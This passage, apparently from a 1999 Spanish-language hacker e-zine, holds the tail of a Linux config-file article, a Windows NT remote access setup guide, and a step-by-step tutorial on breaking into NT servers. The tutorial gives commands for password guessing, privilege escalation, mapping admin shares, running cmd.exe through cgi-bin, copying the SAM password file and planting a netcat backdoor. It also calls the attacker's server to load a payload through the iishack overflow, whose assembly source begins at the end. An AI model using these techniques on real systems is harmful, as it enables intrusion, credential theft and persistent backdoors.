    una  de  estas (directorio spool,  filtro  de  impresion,  nombre  de  la
    impresora, etc.)

/etc/hosts.allow  --> Humm, de  este no estoy muy seguro, asi ke no me pesken
    mucho en la descripcion.
		
    Sirve para ver ke hosts (o direciones IP) tienen permitido el acceso a la 
    makina.
		
    Aki es donde no estoy seguro... Kreo  ke sirve para el ingreso al sistema
    mediante telnet, pero no estoy seguro si tbn  sirve  a  otros  metodos de
    identificacion remota como ssh.

/etc/hosts.deny  --> El  mismo  ke  arriba, solo ke aki se ponen los hosts ke 
    tienen DENEGADO el acceso a la makina.


/etc/hosts  --> Aki pones cosas sobre tu  makina, como el nombre de esta y la
    IP.

/etc/profile  --> Aki  es  donde  se  pone toda la  configuracion  del  shell 
    "bash", y creo ke del "sh" tambien.

    Aki es donde se configura el prompt  ke  te  muestra el shell, se dan los
    valores correspondientes a las variables de shell,  se  ponen  los alias,
    etc.

    Hay ke decir ke este archivo es la configuracion "general" del shell bash 
    (o  del  "sh"),  pero cada usuario puede tener en su "Home directory"  un 
    archivo profile propio, en donde ponga sus preferencias personales. 

    Este archivo se debe  llamar .profile, y DEBE estar en el directorio base 
    del usuario.


/etc/bashrc  --> En  algunas  versiones  de  bash,  este  archivo se ocupa en
    conjunto con el /etc/profile, para dejar mas ordenadas las cosas. 

    En  tales  versiones,  normalmente  aki  se deberian poner  los  alias  y
    configuracion del ambiente de shell.

    Cumple con las mismas reglas ke /etc/profile,  respecto  a  lo  de  poder
    tenerlo en el "home directory"

/etc/rc.d/  --> Normalmente  en  esta  carpeta  se  encuentran los scripts de
    arranke del sistema. Son muy utiles, para editarlos a  mano  y  poner tus
    propias preferencias.

    La ubicacion de esta carpeta depende MUCHO de la distribucion ke uses.

    Incluso en  mi  debian,  no  existe  tal  carpeta,  y  los archivos estan
    directamente en /etc, y algunos bajo init.d/ o rc.boot/.

    Lo mas facil para ver en donde se encuentran para tu distribucion,  seria
    buscar los archivos  ke empiezen con "rc". Normalmente esos tienen ke ver
    todos con  el  arranke.  Tambien   los   directorios   mas  comunes  para
    encontrarlos son  "/etc/rc.d/" "/etc/rc.boot/" y "/etc/init.d/".  (perdon
    si me salto alguno).


/etc/crontab  --> Este  es  el principal archivo de configuracion del demonio
    cron.

   Por si no sabes, cron es un  demonio  ke ejecuta las tareas ke se le pasan
   mediante at y batch automaticamente. cron revisa cada cierto tiempo si hay 
   tareas ke realizar, y si no las hay, se va a "dormir".

   La verdad, cron es una parte importantisima  del  sistema, aunke asi no lo
   parezca. Esto es por ke normalmente nosotros no  interactuamos  mucho  con
   cron, pero muchas partes del sistema dependen de el.


/etc/resolv.conf  --> Aki es donde pones tus servers DNS

/etc/ld.so.conf  --> Aki  va la configuracion de "ld". ld es el "linker"  del
   sistema. 
		
    La verdad, prefiero no extenderme mucho en lo ke es ld, ya ke seguramente
    necesitaras conocimientos basicos de C para entenderlo. La cosa es ke  es
    escencial para el sistema, y no se debe modificar al menos ke sepas lo ke
    hagas. (lo digo por experiencia...  4 veces tuve ke reinstalar Linux  por 
    kulpa del ld).

/etc/lilo.conf  --> Aki va la configuracion de LILO (Linux Loader). 
		
    Para mas info "man|info lilo"



Y  hasta  aki  llegamos  con  este  articulo,  ke  aunke  ha sido algo corto, 
encuentro ke esta lleno de  contenido interesante. 

Ojala  les haya gustado, y tambien porfa perdonen todos los  errores  (ke  no 
deben ser  pocos)  ke  haya cometido, ya ke algunas partes de el articulo las
saque por logica, aunke, ya saben, la logica no siempre es cierta :-) .


Se agradece la TOTAL FALTA DE COOPERACION de mi profe de castellano para este 
articulo. De el es la culpa de  mi  pesima gramatica y de ke repita tanto las 
palabras (en especial la palabra  "bueno", ke me la encontre por todas partes 
cuando revise esto).


Para cualkier tipo de comentarios, mail a 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

*****************************************************************************
TeeSPy <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
-----------------------------------------------------------------------------
Powered by Linux!!!
*****************************************************************************


"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*
"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*

16. _________________________________________ Servidor de Acceso Remoto en NT
                                              By Gengis_KAN

*****************************************************************************
*****************************************************************************
**        NetStorm TeaM Hack'S       By              Gengis_KAN            **
*****************************************************************************
*****************************************************************************

En  este  txt  dare  a  conocer  la forma de preparar Windows NT para Aceptar 
llamadas  y conectar usuarios remotos.  Windows  NT implementa las conexiones 
remotas mediante RAS (Remote Access Server: Servidor  de  acceso remoto). Por 
supuesto esta no es la unica ni la mejor posibilidad, ya que  es  uno  de los 
componente en serie de Windows NT, la parte buena es que es gratis.

Este articulo tendra la siguiente estructura:

1.-Metodos de Comunicacion
2.-Seguridad
3.-Instalar y Configurar el RAS
3.1-Configuracion de los puertos de Serie.
3.2-Configurar el Modem
3.3.-Configurar los puertos RAS
3.4-Configurar las cuentas de usuario de RAS
8.-El marcado Automatico
9.-El protocolo PPTP
10.-Seguridad
11.-Instalacion de PPTP
	 
En este numero vere hasta Configuracion de los puertos RAS

1.- Metodos De Comunicacion de RAS

El  RAS  soporta  clientes que utilicen el protocolo PPP que no sean Moco$oft 
pero utilicen TCP/IP,IPX o  NetBEUI;  y  emplea  los  siguientes  metodos  de 
conexion.

Modem  analogico.  RAS  soporta  una  gran  variedad de modems que puedan ser 
configurados para soportar llamadas entrantes y  salientes a traves de la red 
telefonica conmutada. 

Utiliza 3 tipos de protocolos de modem.

   -Slip. El protocolo de Internet de Linea de  Serie es un protocolo antiguo 
   desarrollado para el GRAN UNIX. Trabaja sin control de errores, control de 
   flujo  ni  seguridad,  pero  consigue  a cambio un  buen  rendimiento  con 
   peque~os  bloques  de  datos.  RAS soporta SLIP  para  llamadas  salientes 
   permitiendo acceder a equipos NT e Inet. 
	 
   -PPP. El  protocolo  Punto  a  Punto  es  un  SLIP  mejorado con control y 
   recuperacion  de   errores.  RAS  soporta  PPP para llamadas  salientes  y 
   entrantes.

   -RAS. Es un protocolo  desarrollado  por Moco$oft para soportar NetBIOS en 
   todas las versiones de RAS.

Modem Nulo. Es un cable que conecta dos Ordenatas  a travez de sus puertos de 
serie RS232C.

De esta manera se puede conectar un ordenata a una red,  utilizando RAS y sin 
necesidad de una tarjeta de red.

RDSI. La  linea digital ha supuesto un gran avance en comunicacion digitales.

Utiliza 2 routers, uno en cada extremo, y una linea digital para enviar datos 
a 64Kb por  segundo,  esta  cifra se puede doblar hasta 128Kb/s utilizando el 
segundo canal.

X25. Este es un metodo muy eficaz pero antiguo  y lento. Permite conectarse a 
una red utilizando dos routers, uno en cada extremo,  y  un sistema basado en 
paquetes  de  viaje  a  travez  de  la  linea telefonica. Su  utilizacion  es 
recomendable para distancias cortas y poco volumen de datos.

2.- Seguridad 

RAS  soporta un nivel muy alto de seguridad, ya que las llamadas entrantes de 
usuarios   tienen  que  ser  autentificadas  por  Windows  NT Server antes de 
permitir su entrada en la red. Ademas puede ser configurado para trabajar con 
devolucion de llamada, o sea, cuando un user llama el RAS cuelga esta llamada 
para a continuacion efectuarla a un telefono previamente establecido. De esta 
forma  aunque  alguien sepa la password de un usuario no podria  realizar  un 
acceso remoto, ya que RAS llamaria al telefono del usuario original.XD


3.- Instalar y configurar el RAS

Para  instalar  y  configurar  RAS hay que iniciar la sesion como usuario del 
grupo de administradores y seguir los siguientes pasos:

	 3.1 Configurar los puertos de Serie.
	 3.2 Instalar uno o varios modem
	 3.3 Configurar los puertos RAS
	 3.4 Configurar las  cuentas de usuarios que tendran acceso remoto.

 3.1- Configuracion de los puertos de Serie
	
Para configurar los puertos de serie haremos click sobre el icono PUERTOS del 
Panel  de  Control.  Seleccionaremos  aquellos puertos que nos interesen para 
RAS, cambiando los valores de la configuracion  que  nos  interesen,  tambien 
podemos agregar o eliminar puertos desde esta pantalla.

Como Windows NT da Soporte a 256 puertos podemos evitar el usual conflicto de
los com1 y com3, y com2 y com4, reasignando por ej. el com3 como 253.

 3.2- Configurar el Modem

Una  vez  instalado  el  modem,  siguiendo los pasos usuales para instalar un 
modem en win. Un modem posible es  el  cable  de serie de acceso telefonico a 
redes  entre  2  PC.  Esto  seria NULL MODEM (se encuentra  entre  los  modem 
estandar).

Al a~adir un modem a RAS podemos  especificar  el  uso  que  deseamos para el 
puerto,  esto  es  "Solo  para  hacer llamadas", "Solo para recibir llamadas"
o "Hacer y recibir llamadas", tambien se  puede  especificar  si  los accesos 
a travez  del  puerto permitiran acceder a toda la red o solo al servidor que 
recibe la llamada.


 3.4- Configurar los Puertos RAS

En  la configuracion del RAS ademas de configurar los protocolos para hacer y 
recibir llamadas, podemos configurar la configuracion(XD) de la codificacion.

Permitir  cualquier  tipo de autentificacion, incluso texto simple. Al marcar 
esta opcion se permite a  los  clientes  que  usen  este servicio utilizar la 
autentificacion que ellos soliciten (MS-CHAP, MD5-CHAP, SPAP o PAP).

Exigir  autentificacion cifrada. Al marcar esta opcion  se  permitira  a  los 
clientes  que  usen  este  servicio  utilizar  la  autentificacion  que ellos 
soliciten menos PAP.

Exigir  autentificacion  cifrada  de Moco$oft. Al marcar esta accion solo  se 
permitira la conexion a los clientes que utilizen la autentificacion MS-CHAP. 

Tambien  podemos  marcar  exigir datos cifrados para asegurarnos de que todos 
los datos enviados por la red  vayan codificados. RAS ofrece cifrado de datos 
mediante aforismo RSA DATA SECURITY  INCORPORATED  RC4. Esta opcion es la mas 
segura de las otras 3.

Activar  enlace multiple. Al marcar esta opcion, se permite aumentar el ancho 
de banda de la  transmicion  al  combinar  multiples  vinculos  fisicos en un 
grupo, aunque solo sera efectivo cuando el servidor y los clientes RAS tengan 
activado el enlace multiple.



Hengis_KAN, NetStorm TeaM Hack'S 1999

 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
	
"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*
"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*

17. _________________________ Como hackear servidores NT a traves de Internet
                              By PlaXiuS

Holas,  en esta ocasion hablare sobre algunas tecnicas rapidas y sencillas de 
hackear servidores NT. Algunos pasos son bastante simples y realmente asombra 
el nivel  de  riesgo  que existe en los servidores Ineternet que manejan este 
SO. 

Este articulo solo es  un  breve  capitulo  de  un  white  paper  que preparo 
respecto  a  la  seguridad  en  Windows  Nt,  es  asi  que solo es un peque~o 
aperitivo que espero disfruten.

Bueno en este articulo no entrare en profundidad en el  tema  de  WinNT  como 
tampoco  hablare  sus  caracteristicas ,  etc ... Solo apuntare y explicare a 
nivel demostrativo es decir paso a paso (especial  para newbies , lastima que 
debe haber un par de lamerones por ahi leyendonos , que  tratara  de crackear 
servers hasta decir basta para demostrar asi que son unos superhackers... que 
pena  me  dan) ,  haremos  ejemplos practicos y veremos que debemos hacer  en 
casos especiales .



        Muchos  se  preguntaran  cual  es  la  tecnica escondida que usan los 
  hackers, ya que muchos newbies piensas que los  grandes  hackers se guardan 
  sus truquitos para si mismo (yo tambien pensaba lo mismo),  es  verdad  que 
  hay  tecnicas  complicadas  como  seria  el  hijacking ,  pero que han sido 
  detalladas  he incluso apolladas por programas para el uso de  los  no  tan 
  avanzados .

  Bueno en esta ocasion no hay otro truco ni fuerza especial que nos ayude ..
  de hecho  los  hackers  no utilizan trucos, de hecho estoy aburrido de leer
  en algunas paginas webs algo  asi como trucos hackers !!!! PERO QUE DIABLOS
  ES ESO !!!

HorA dE hUSMEAR EN EL SERVER !!!!

Bueno  hay muchos hackers UniX que se manejan super bien en este sistema pero 
que sorpresa  se  llevan  cuando su nueva incursion se trata de un server NT, 
algunos  quedan  marcando ocupado  tratando  de  utilizar  troyanos como Back
Oriffice, Netbus y  todos  esos  programa  basura  que andan por ahi que solo
sirven para que cualquier lamer se las de de superhacker; pero que no debemos
despreciar pues algunas veces nos pueden salvar la vida.

Bueno la tecnica que propongo es la siguiente .

Si  nos  hemos  dado cuenta el server es un WInNT, tenemos que asegurarnos de 
que tenga los  puertos  netbios  abiertos  y  eso  se  hace con el famosisimo 
nbtstat.

c:>nbtstat -A ipdelserver
			 
    NetBIOS Remote Machine Name Table

Nombre         Tipo  Estado
---------------------------------------------
Registrado Registrado Registrado Registrado Registrado Registrado Registrado 
Direcci¢n MAC = 00-10-5A-CD-98-8E

MONITOR        <00>  UNIQUE      
DOMAIN         <00>  GROUP       
MONITOR        <03>  UNIQUE      
MONITOR        <20>  UNIQUE      
DOMAIN         <1E>  GROUP       
INet~Services  <1C>  GROUP       
IS~MONITOR.....<00>  UNIQUE      

Bueno con esto ya sabemos  que  el  nombre netbios de la maquina es MONITOR y 
que pertenece a un dominio llamado  DOMAIN, tb sabemos que esta corriendo IIS 
por el INet~Services.

Si  nos  entrega este resultado estamos en buen camino si no, intentamos usar
otra tecnica  (mas adelante  describo). Es  importante  decir  que hay muchas 
makinas  Linux  que  nos  pueden  entregar  un  resultado  parecido si  estan 
compartiendo unidades a traves de netbios (a traves de SAMBA).


USANDO RETINA 
##############



        RETINA

        Retina  es  un  programa  creado  por  Eeye Security Team, los mismos
        creadores  del  IISHACK  y  que no es mas que un scaneador de puertos
        y  de  debilidades  del  sistema.  Es  capaz de  reconocer el tipo de 
        sistema operativo, servicios, versiones , etc ...

        Que hace a retina especial ?
        Retina  nos  mostrara  un detalle avanzado de las caracteristicas del
        sistema scaneado, pero la  funcion  mas importante es la capacidad de
        sacar informacion a los servidores NT, si  tienen los puertos netbios
        que  serian  en  este  caso  el  135, 137, 139 , siendo el 139 el mas
        importante para nuestras incursiones (no  no vamos a nukear a nuestro
        huesped, nunca una actitud tan lamer no crees) , ahora por que es tan
        importante este puerto , pues solo por que es el  puerto de nbsession
        es  decir el de sesiones netbios ...newbie:pero que diablos significa 
        eso,.. pues simple , es atraves de este servicio que podremos accesar 
        a unidades o recursos compartidos del server.

        Retina corre sobre Windows NT 4.0 sp4 y debes tener IE 4.0 instalado.
        [Nota: Hemos probado el Retina  en  NT  4.0  Workstation,  con  SP3 y
        funciona a las mil maravillas]

Retina tiene varias secciones .

Browser : si !!! podemos navegar las paginas con retina.

Miner : Con esta  opcion r etina trata de capturar passwords a travez de http 
con el comando get. si existe  algun  tipo  de  archivo  con  passwd ya sea a 
travez  de  cgi  o  lo  que  sea retina es capaz de capturarlos (esto  es  en 
servidores mal configurados) ademas es capaz de detectar el fallos del IIS 4, 
explotable con el iishack.

Scanner: Con esta opcion podemos  obtener informacion sobre direccion, nombre
de dominio, sistema operativo, servicios, vulnerabilidades,  puertos, nombres
usuarios, etc...

Tracert :  Bueno  su  nombre  lo dice, nos muestra al trazo que debe recorrer
un paquete hasta su destino,  mostrando  graficamente el nivel de lag en cada
direccion IP.

Bueno  nos  centraremos  en  el  scanner  ya  que  es  esta opcion la que nos 
entregara la informacion vital para buscar un metodo de entrada al server.

Bueno veamos los topicos del SCANNER!!!

GENERAL
=======
Bueno  en esta secci¢n nos muestrala direccion IP del server, fecha del scan, 
nombre de dominio, etc..

AUDITS
======
Bueno  aki  muestra  un  detalle  de  vulnerabilidades  con  sus  respectivas 
correciones y parches. Especial para administradores que quieren mantener sus 
sitios seguros. 

MACHINE
=======
Aki  aparecen los detalles de la maquina como los son la mac address, SO y su
version, veriones de servicios (ejm www),etc..

PORTS
=====
Tan simple como un Scan de puertos.

SERVICES
========
Son  los  servicios  que el servidor esta corriendo como lo seria el browser,
dhcp, dns, etc...

SHARES
======
Bueno el nombre lo dice, sip lo directorios y unidades compartidas ...

USERS
=====
Esta  es la parte entretenida, bueno aqui obtenemos los usernames del sistema
como  tambien  las  caracteristicas  del usuario incluyendo el ultimo logon y 
logoff como tambien el SID de cada usuario.

Bueno una vez terminado el scan, comenzamos la accion !!!!

Lo  primero  que debemos hacer es buscar los usuarios que tengan nivel 2, eso
quiere  decir  que esos usarios pertenecen al grupo de administradores. ahora 
abrimos el ftp , nos  conectamos  al  server  victima  e  intentamos  algunas
passwords por defecto, teniendo en cuenta que aparte de los usernames tenemos
los  nombres  de  los usuarios , muchas mas posibilidades; recomiendo que  no
probeis mas de dos  veces  ya  que  podrias  bloquear las password de akellos
usarios  haciendo  sospechar  a los administradores de  posibes  entradas  al
sistema.  Es  comun encontrar a un usuario llamado IUSR_NOMBREDELSERVER, este
usuario  sirve  para  autentificacion  anonima de los usarios a los servicios
internet pero muchas veces los administradores  al  tener  problemas  ( o  no
saber  configurar  como  corresponde los servicios de IIS) con esta cuenta la
pasan al grupo de administradores y lo que es peor cambian su password (grave
error)  por  la  misma  o  una  por  defecto,  siendo que el sistema crea una 
password casi incrackeable ;entonces probad con esa tambien.

Si  hemos  tenido  exito  estamos en buen camino de lo contrario , empiezas a 
probar  que  el  resto  de los  ususarios  mortales  y  ten  por  seguro  que
encontraras alguna password que corresponda. Usa la siguiente tecnica
								 
username:jperez
passwd:jperez
username:jperez
passwd:juan

De seguro que encontraras algo ,si es asi tambien vamos por excelente camino.

Bueno  que  ocurre  entonces  si no encontramos la password de un usuario que 
pertenezca  al  grupo de administradores  (nivel 2)  y  solo  encontramos  la 
password de un usuario comun ?

Bueno en este caso  podemos  correr  un exploit llamado sechole, que funciona
de la misma manera que el famoso getadmin, entremos en mas detalles :

        Getadmin :  Uno  de  los primeros Xploits conocidos de NT, su funcion
        radicaba en pasar a un  usuario  normal  al  grupo de administradores
        , este   exploit  aprovechaba  los  hilos  de  procesos  que  estaban
        relacionados  con  la cuenta del grupo de administradores de dominio.
        por  ejemplo  en  MS  Exchange  es un proceso que corre bajo el grupo
        o  la cuenta  del admin , es  decir  si  inicias  sesion NT con  otro
        usuario  que  no  sea  administrador,  MS  Exchange  no  parte . Esta 
        relacion  se  puede  verificar  en los detalles del icono "servicios"
        del  panel  de  control.  Bueno  aprovechando estos hilos de procesos
        getadmin  era  capaz  de  agregar a   un  usuario  comun  al grupo de
        administradores.

        Sechole :  hace  extactamente lo mismo que getadmin con la diferencia
        que ha mejorado su  rendimiento  trabajando  en  maquinas con service
        pack 3 instalado (service pack 4 y 5 solucionan este fallo).
				
Sechole  funciona  en  forma local a travez del debuger de WinNT y trabaja de
la siguiente forma :

c:\>sechole 

El  problema con sechole es que solo trabaja en forma local, es decir solo se 
puede correr en la consola del server.

Es  por  esta  razon  que  sacaron  un  nuevo exploit, llamado "Secholed" que
realiza el mismo trabajo que sechole. Secholed  se  utiliza  de la  siguiente
forma :

c:\>secholed username ipaddress

De  esta forma podemos obtener nivel de administrador en un server remoto, es
decir control total ;).

Nota.-  Sechole  y Secholed, solo trabajan en plataformas WinNT hasta service
pack 3 , version  Ingles;  es necesario que el servidor corra un proceso bajo
una cuenta que pertenezca al grupo de administradores.

Para  versiones  en  espa¤ol  o cuando el grupo de administradores tiene otro
nombre diferente al normal  "administrators"  debemos  utilizar  un  programa
llamado  "Beadmin",  el  problema  con  este sistema es que debemos correr el
programa  solo  en  forma  local, es decir frente a la consola... remotamente
es posible hacerlo a travez del directorio /cgi-bin/ mas adelante explico.

""" Problema """  Que  pasa  si  no  tengo WINNT en mi pc, como podre obtener
los usernames o los directorios compartidos  si  retina corre solo en WINNT??

""" Solucion """  Existe  un  programa  llamado  ntis,  que  tiene  la gracia
de  mostrar  los recursos compartidos y los nombres de usuario de una maquina
funciona de la siguiente manera :

c:\ntis \ipaddress

Tambien tiene la opcion de crackear passwords, bueno en realidad es un ataque
a  fuerza  bruta, es decir trata de conectarse al server tratando de adivinar
la  pass,  este  ataque  es  efectivo  siempre  y cuando el servidor no tenga 
definida el bloqueo de la cuenta por intentos de passwords fallidos. 

Bueno y como funka este metodo??

c:\ntis -crack \ipaddress user pwlist

Donde  user  es  el  nombre  de usuario del sistema y pwlist es un archivo de 
texto plano que puede ser perfectamente  un  diccionario  de palabras de esos 
que se utilizan para el john the ripper.

AHORA VA LA PARTE ENTRETENIDA
=============================

Si  has  conseguido  una password es hora de intentar conectarnos al servidor
ahora debemos tener en  cuenta  que  unidades tiene compartidas. Casi siempre
estan compartidas las unidades de disco  con  un  signo  $ , en WINNT esto se
hace  por  defecto  ya  que se utiliza para fines administrativos,  si  hemos
conseguido  una   password   de  un  usuario  con  privilegios  "2"  podremos 
conectarnos a estas unidades. Ahora  debemos conectar el recurso que comparte 
el servidor como si fuera una unidad de  disco,  veamos  como  lo  hacemos si 
utilizamos el comaned NET USE.

c:\>net use x: \ipaddress\c$ password /USER:nombre_de_usuario
El comando se completo con exito
c:\>x:
x:\>dir 
.
..

Para desconectarse tienes que cambiar de unidad y utilizar la opcion /DELETE

c:\>net use x: /DELETE
x: ha sido eliminado

Bueno esto es valido para Windows NT .. pero si estas en una estacion Windows 
95, te recomiendo hacerlo de la sgte manera;

*Reiniciar el computador, al momento de pedir la clave de win95  debes  poner 
el username y la password que has descubierto a fuerza bruta.

*Abrir  una  ventana DOS y editar el archivo lmhosts, asi solo sin extension,
y pones la siguiente linea :

ipaddress    nombre de makina

EJM ;

10.0.0.1     MONITOR

Guardas los cambios en el archivo. y despues ejecutas el siguiente comando

c:\>nbtstat -R  

Es importante  que  la  R sea mayuscula ya que con este comandos limpiaras el
cache netbios en tu makina.

*Ahora conectas una unidad de red

c:\>net use x: \nombre_makina\recurso_compartido

ejm:

c:\>net use x: \monitor\c$

Y  listo,  te conectas  a  la  unidad  para  borrarla  solo  haces el /DELETE 
como ya lo mencionaba antes .


Ahora si te  gustan los entornos graficos, tan  solo le haces un click con el
boton derecho en mi  pc  y  seleccionas  la  opcion  conectar unidad de red y
listo.

Ahora  por  que  es  importante el nbtstat -R y el lmhosts. Bueno lo que pasa
que el archivo lmhosts  sirve  para  conectarnos a redes y subredes que estan
detras de un router, ya que el  router  no  permite pasar el brodcast netbios
es imposible que nuestro pc pueda conocer el  nombre de la makina. comunmente
en  redes muy grandes en las cuales se deber  separar  trafico  a  travez  de 
routers  no se pueden ver los pcs a traves de entorno de redes ni mucho menos
podran  sincronizarse  los  BDC  con  el  PDC. La  solucion seria instalar un 
servidor wins a cada lado del router (cosa ya mas  dificil de realizar), pero 
tambien  se  puede  hacer a travez del archivo lmhosts y como  todos  sabemos 
internet es un conjunto  de  muchos  routers XDD , es este archivo el que nos 
permite hacer un reconocimiento NETBIOS a traves de estos aparatitos.

El  NBTSTAT -R  es  importante  ya  que  con  este comando limpiamos el cache 
netbios pudiendo asi reconocer la makina objetivo.

Bueno  hay  que  decir  que  los  recursos compartidos pueden ser varios y no
faltara la oportunidad que puedas  encontrarte  con  una unidad compartida en
seco .... XDDD traduzco mejor ...

Unidades del tipo 
c
d
e
disco_c
inetpub

Muchas  veces  los  administradores  comparten  estas unidades de red para el 
grupo everyone, es decir control total sobre estos; que quiere decir esto ...
que si me conecto como un usuario comun podria tener acceso al disco completo
sin restricciones.


ENTRANDO POR EL FTP 
===================

Muchos  servidores  que  sirven  como  webhosts permiten entrar al directorio
"inetpub/wwwroot" desde el servicio FTP, para que de esta manera los clientes
puedan  accesar  a  sus sitios webs. Dentro del directorio wwwroot existe uno 
muy  especial  al  cual  podemos  sacar  el maximo provecho, es el directorio 
/cgi-bin ,  bueno  como  todos  sabran  este  directorio nos permite ejecutar 
programas  en  el web lo cual aumenta las posibilidades de crear aplicaciones
en  el  web,  bueno  es  esta  la  posibilidad que nos permitira crearnos una
entrada al server.

Si  entramos  con una clave correcta (es decir sin anonymous, aunque en estos
dias quien sabe) y nos aparece lo sgte.

ftp>ls
wwwroot
utilities
webhosting
etc...
etc...
ftp>cd wwwroot
cgi-bin
samples
etc..
etc..

Podemos entrar al cgi-bin y copiar el archivo cmd.exe que es el interprete de
comandos de windows NT. ahora que logramos con esto .. pues veamos

ponemos la URL :

URL:http://www.victima.com/cgi-bin/cmd.exe?/c%20dir


Directorio de C:\InetPub\wwwroot

16/12/98  18.45                   .
16/12/98  18.45                   ..
23/12/98  16.55                   samples
31/03/99  13.57                  2.697 default.htm
26/02/99  11.25                   _private
26/02/99  11.25                   cgi-bin
26/02/99  11.25                   images
26/02/99  11.25                  1.759 _vti_inf.html


#Bueno como veran hemos hecho un lindo y precioso "DIR" recuerden el %20  que
equivale a los espacios.

URL:http://www.victima.com/cgi-bin/cmd.exe?/c%20dir%20c:\winnt\repair

 Directorio de c:\winnt\repair

23/12/98  16.23                   .
23/12/98  16.23                   ..
23/12/98  16.56                 78.441 system._
23/12/98  16.56                134.809 software._
23/12/98  16.56                 15.795 default._
23/12/98  16.56                  6.801 security._
23/12/98  16.56                  3.444 sam._
23/12/98  16.56                 15.168 ntuser.da_
17/11/96  12.00                    523 autoexec.nt
23/12/98  12.55                  1.343 config.nt
      10 archivos        256.324 bytes
                         835.715.072 bytes libres

#VEAMOS el directorio repair ... vamos por la sam._

http://www.vicitma.com/cgi-bin/cmd.exe?/c%20copy%20c:\winnt\repair\
sam._%20c:\inetpub\ftproot

CGI Error
The  specified  CGI application misbehaved by not returning a complete set of 
HTTP headers. The headers it did return are:

  1 archivos copiados.

#Aki  copio  la  sam  en  el ftp para bajarla y expanderla para poder obtener
alguna otra password.

#mm  veamos  un  troyano  en  accion... copiamos  el  ncx99.exe (variante del 
netcat) y lo copiamos en el directorio CGI.

URL:http://www.victima.com/cgi-bin/ncx99.exe

se quedara el navegador cargando entonces hacemos un telent al puerto 99.

telnet www.victima.com 99

Welcome etc....

c:\inetpup\wwwroot>

Podemos  ejecutar  un  dir o lo que queramos ... cuando demos pongamos "exit"
en ncx99 se cerrara automaticamente en el servidor.

Bueno asi podemos cargar un millon de cosas en este directorio siendo de esta 
forma un excelente backdoor para WINNT.


IISHACK
=======

Bueno  esta  es  otra  forma  facil  (la  mas facil) de hackear servidores NT
aki solo me remitire a explicar como funciona y de que nos puede servir.

El  iishack  es un Exploit para windows NT o mas bien dicho para el IIS 4, es 
decir  cualquier  servidor que tenga IIS mas el option pack 4. Lo que hace el
iishack es aprovechar un fallo de este servicio para hacer un buffer overflow 
y de esta forma puede cargar y ejecutar un programa "X", veamos la practica.

c:\>iishack www.vicitma.com 80 www.miservidor.com/ncx99.exe

Una vez hecho el procedimiento hacemos un telnet al la vicitma al puerto 99 y
listo . Tenemos acceso al disco .

Es  importante  que  el  servidor  no  este protegido por un firewall o jamas
podras  entrar  en  el  puerto  99,  pero  si fuese asi; existe otra variante
llamada  ncx.exe  que  te  abre el puerto 80 (siempre abierto para el wwww) y
puedes correrlo aun con firewall intermedio.

UNA IDEA 
========

El  servidor  tiene  el ftp abierto, subes en ncx99.exe al ftp a traves de la
cuenta  anonymous .  Ejecutas  el  iishack  en  el server y copias el archivo
ncx99.exe  desde  el  directorio  "unidad\ftproot\ncx99.exe"  al   directorio
"unidad\wwwroot\cgi-bin\ncx99.exe",  ahi  tienes  un  backdoor  instalado que
cada vez que tengas que usar, solo tendras que poner la URL:

www.vicitma.com/cgi-bin/ncx99.exe

y luego hacer un telnet al puerto 99 para entrar ....

FACIL NO !!!!

PERO  QUE  ME  HE  BAJADO  EL IISHACK.EXE DESDE UNA PAGINA DE HACKING Y NO ME
FUNCIONA !!!!

Bueno  a  muchos  debe haberles pasado, pero el problema es que el ejecutable
que  habia  publicado  Eeye  Security  Team estaba con algunos probleamas (yo
creo  que  intencionalmente para que los lamercillos no se pongan a jugar asi
como  asi ...  tan  facil  la cosa no  es ) es asi que si quieres el programa
tendras  que  compilarlo ..  cosa  muy  facil  pues  en  el codigo  estan las 
instrucciones ....

**************Comineza el Codigo********************************************

; IIS 4.0 remote overflow exploit.                       
; (c) dark spyrit -- 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
;
; greets & thanks to: neophyte/sacx/tree/everyone in #mulysa and
;                     #beavuh... and all the other kiwi's except ceo.
;
; credits to acp for the console stuff..
;
; I don't want to go in too deeply on the process of exploiting buffer
; overflows... there's various papers out there on this subject, instead I'll
; give just a few specifics relating to this one..
;
; Microsoft was rather good to us on this occasion, stuffing our eip value
; directly into a register then calling it.. no need to stuff valid addresses
; to make our way through various routines to eventually return to our 
; address... but, unfortunately it wasn't all smooth sailing. 
; Various bytes and byte sequences I was forced to avoid, as you'll quickly
; notice should you bother debugging this.. various push/pop pairs etc.
; I don't bother with any cleanup when all is done, NT's exception handling
; can cope with the mess :)
;
; The exploit works by redirecting the eip to the address of a loaded dll, 
; in this case ISM.DLL. Why?
; Because its loaded in memory, is loaded at a high address which gets around
; the null byte problem.. and is static on all service packs.
; The code from ISM.DLL jumps to my code, which creates a jump table of
; of functions we'll need, including the socket functions.. we do this 
; because unfortunately the dll's import tables don't include nearly enough
; of the functions we need..
; 
; The socket structure is created and filled at runtime, I had to do this
; at runtime because of the bad byte problem.. after this a small buffer is
; created, a get request issued to the web site of the file you want to 
; download.. file is then received/saved to disk/and executed..
; Simple huh? no not really :)
;
; Have fun with this one... feel free to drop me an email with any comments.
;
; And finally, heh.. "caveat emptor".
;
;
; you can grab the assembled exe at http://www.eEye.com.
;
; to assemble:
;
; tasm32 -ml iishack.asm
; tlink32 -Tpe -c -x iishack.obj ,,, import32


.386p
locals
jumps
.model flat, stdcall


extrn GetCommandLineA:PROC
extrn GetStdHandle:PROC
extrn WriteConsoleA:PROC
extrn ExitProcess:PROC
extrn WSAStartup:PROC
extrn connect:PROC
extrn send:PROC
extrn recv:PROC
extrn WSACleanup:PROC
extrn gethostbyname:PROC
extrn htons:PROC
extrn socket:PROC
extrn inet_addr:PROC
extrn closesocket:PROC

.data

sploit_length           equ     1157

sploit:
 db "GET /" 
 db 041h, 041h, 041h, 041h, 041h, 041h, 041h
 db 576 dup (041h)
